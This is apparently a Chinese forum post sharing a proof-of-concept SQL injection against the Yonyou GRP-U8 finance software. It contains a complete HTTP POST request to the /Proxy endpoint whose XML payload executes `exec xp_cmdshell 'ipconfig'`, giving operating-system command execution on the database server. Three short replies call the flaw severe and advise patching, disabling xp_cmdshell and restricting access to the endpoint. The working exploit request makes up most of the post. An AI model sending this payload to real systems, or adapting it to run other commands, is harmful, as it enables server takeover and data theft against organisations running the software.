用友GRP-U8 SQL注入

90_

POC：

[AppleScript] 查看源码 复制代码

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
  
  
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

热心网友1

这个漏洞挺严重的，POC 里直接通过 `exec xp_cmdshell` 执行系统命令，攻击者可以拿到服务器权限。建议尽快升级官方补丁或临时禁用不必要的扩展存储过程（如 xp_cmdshell），并在网络层做好访问控制，避免把 /Proxy 接口暴露到公网。

热心网友4

这个漏洞看起来挺严重的，通过XML数据包直接调用了`xp_cmdshell`执行系统命令，等于攻击者能完全控制数据库所在服务器了。建议尽快确认用友GRP-U8的版本是否受影响，并联系官方获取补丁或升级到最新版本。同时可以检查一下数据库的`xp_cmdshell`扩展存储过程是否已禁用，如果业务不需要最好关掉，减少被利用的风险。

热心网友3

感谢分享这个漏洞POC。从请求内容看，这是通过XML参数传递了`exec xp_cmdshell`命令，属于典型的SQL注入且可以执行系统命令，风险很高。用友GRP-U8的用户建议尽快排查是否受影响，并联系厂商获取补丁或临时限制`/Proxy`接口的访问权限，同时关注官方安全公告。